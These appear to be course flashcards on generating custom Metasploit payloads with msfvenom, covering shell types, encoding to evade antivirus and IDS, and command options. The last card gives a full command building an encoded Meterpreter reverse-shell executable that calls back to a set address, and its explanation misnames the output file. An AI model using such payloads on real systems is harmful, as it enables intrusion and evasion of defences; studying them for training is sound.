17.3 Custom Payloads with msfvenom Flashcards

1
Q

What are payloads?

A

A payload is the shell code that runs when an exploit successfully compromises a system.

2
Q

Why do attackers build custom payloads?

A

Attackers typically build custom payloads that they can use in phishing emails or add to their websites. When unsuspecting users click the link for the malicious payload, their computers are infected.

3
Q

Custom payloads allow customization of various payload options such as:

A
  • Architecture
  • Shell type
    • Reverse
    • Bind
    • Meterpreter
    • Other proprietary C2 shell
4
Q

In order to create custom payloads, attackers use a tool called ______, which is a Metasploit Framework tool used to _____________.

A

In order to create custom payloads, attackers use a tool called msfvenom, which is a Metasploit Framework tool used to generate and encode payloads.

5
Q

True or false: Metasploit needs to be running in order to use msfvenom.

A

False

Metasploit does not need to be running in order to use msfvenom.

6
Q

While it’s relatively easy to create custom payloads, the real challenge is ____________.

A

While it’s relatively easy to create custom payloads, the real challenge is creating a payload that bypasses network detection by IDS and antivirus (AV) solutions.

7
Q

________ is a method used to evade detection tools.

A

**Encoding** is a method used to evade detection tools.

8
Q

How does encoding evade detection?

A
  • It changes the signature of an exploit or payload, creating a new signature that has no written rule.
  • This change in signature allows payloads to bypass detection from AV and IDS tools that detect known malicious signatures.
9
Q

The most important msfvenom options are:

  • -p –
  • -e –
  • -a –
  • -s –
  • -i –
  • -x –
  • -o –
A
  • -p – designates the Metasploit payload we want to use.
  • -e – designates the encoder we want to use.
  • -a – designates the architecture we want to use (the default is x86).
  • -s – designates the maximum size of the payload.
  • -i – designates the number of iterations with which to encode the payload.
  • -x – designates a custom executable file to use as a template.
  • -o – designates an output file to be created, specifying its name and location.
10
Q

Explain the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe -o /tmp/hack.exe LHOST=192.168.0.8 LPORT=4444

A

- msfvenom: Launches the msfvenom program.

- -p: Indicates the payload.

- windows/meterpreter/reverse_tcp: The Metasploit command module.

- -a x86: Designates the architecture we will use. x86 is the default.

- -e x86/shikata_ga_nai: Designates the encoder we will use.

- -f exe: Indicates the file type to create. In this case, .exe.

- -o /tmp/malware.exe: Creates an output file, naming the file (malware.exe) and location (inside the /tmp directory).
